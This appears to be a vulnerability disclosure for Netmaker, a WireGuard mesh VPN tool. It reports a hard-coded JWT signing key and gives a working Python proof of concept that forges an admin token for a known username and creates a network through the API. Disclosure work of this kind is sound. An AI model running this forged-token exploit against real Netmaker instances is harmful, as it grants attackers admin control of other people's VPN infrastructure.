Description

Netmaker is an applicaton that enable easly deployment of a mesh vpn based on Wiregaurd.

To authenticate and manage users throughout the application, it is used JWT tokens.

The secret key used to sign these tokens is hard-coded in the code, which means they can be faked. So, an attacker can create a valid authentication token for any user and use it with admin privileges since the privilege verification is implemented on top of them.

Proof of Concept

To explore this vulnerability is necessary to know an existent username.

Instructions:

1. Change the username and netmaker_api variables for an existent username and the api url of your instance.

2. Run the exploit below.

from requests import post
import jwt # pip3 install pyjwt


username = 'cenas1' # CHANGEME valid username
netmaker_api = "https://api.nm.1-7-8-9.nip.io:443" # CHANGEME please change this for your api host

netmaker_url = netmaker_api + "/api/networks"

hardcoded_secretKey = '(BytesOverTheWire)'

encoded_jwt = jwt.encode({
  "IsAdmin": True,
  "UserName": username,
  "Networks": [],
},hardcoded_secretKey, algorithm='HS256') # creates a "fake" JWT token

headers = {"Authorization": "Bearer " + encoded_jwt}


d_json={"addressrange": "10.134.2.0/24", "addressrange6": "", "defaultudpholepunch": "yes", "isdualstack": "no", "islocal": "no", "localrange": "", "netid": "illegalnet"}

r = post(netmaker_url, headers=headers, json=d_json)

3. Go to the Networks tab, on the netmaker-ui and check if a new network was created, called illegalnet.

Impact

An attacker knowing the username of a valid user can perform any action as a user with admin privileges.

Possible mitigation

Generate a random JWT key in the instalation process.